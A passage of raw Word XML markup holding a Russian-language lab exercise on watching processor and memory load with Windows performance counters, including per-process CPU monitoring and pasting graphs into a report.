    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="sag_mpmonperf_dtzx"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Осуществите наблюдение за загруженностью процессора</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="317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 если оно было запущено;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Очистите экран перед началом наблюдения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="266700" cy="288290"/>
            <wp:effectExtent l="1905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67" cstate="print"/>
                    <a:srcRect l="23157" t="10612" r="74377" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="266700" cy="288290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Добавьте следующие счетчики: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процессор\% загруженности процессора, Процессор\ % работы в пользовательском режиме, Процессор\ % работы в привилегированном режиме</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Счетчик </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>% загруженности процессора</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> включает суммарное время выполнения задач в</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>пользовательском режиме и режиме ядра операционной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">технической точки зрения это время, в течение которого не выполняется процесс бездействия системы System Idle. Процесс бездействия системы выполняется все время, когда не выполняются другие процессы, использующие процессорное время. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Счетчики </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>% работы в пользовательском режиме</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (% User Time) и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>% работы в привилегированном режиме</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(% Privileged Time) позволяют по отдельности отслеживать время процессов в пользовательском режиме и</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>режиме ядра. Они могут помочь определить, где находится источник проблем — в пользовательских приложениях или в самой операционной системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите изменения изображения, осуществите ряд действий (запустите программу на выполнение, например  </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paint</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или Калькулятор, выполните какие-либо операции в данном приложении, сохраните, закройте);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="317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 вставьте в отчет полученный график;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Проанализируйте полученные данные, превышает ли допустимый порог показатели счетчика </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Процессор\% загруженности процессора </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(смотри Приложение №1).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если вы видите, что счетчик процента загруженности процессора для объекта </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процессор</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет высокое значение, вы можете с помощью объекта </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процесс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> настроить </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>мониторинг для каждого отдельного процесса. Это позволит определить, какие из процессов требуют больше всего процессорного времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Настроить мониторинг загруженности процессора для каждого отдельного процесса, определить какой процесс требует больше всего процессорного времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="317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 если оно было запущено;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Очистите экран перед началом наблюдения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="266700" cy="288290"/>
            <wp:effectExtent l="1905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67" cstate="print"/>
                    <a:srcRect l="23157" t="10612" r="74377" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="266700" cy="288290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Добавьте следующие счетчики: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Процесс\% загруженности процессора  </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>выберите</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Все вхождения;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Среди счетчиков удалите счетчик для экземпляра</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Total</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите изменения изображения, осуществите ряд действий (запустите программу на выполнение, например  </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paint</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или Калькулятор, выполните какие-либо операции в данном приложении, сохраните, закройте);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="317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 вставьте в отчет полученный график;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проанализируйте полученные данные, определите процесс более всего занимающий процессорное время;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>Осуществите наблюдение за загруженностью памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
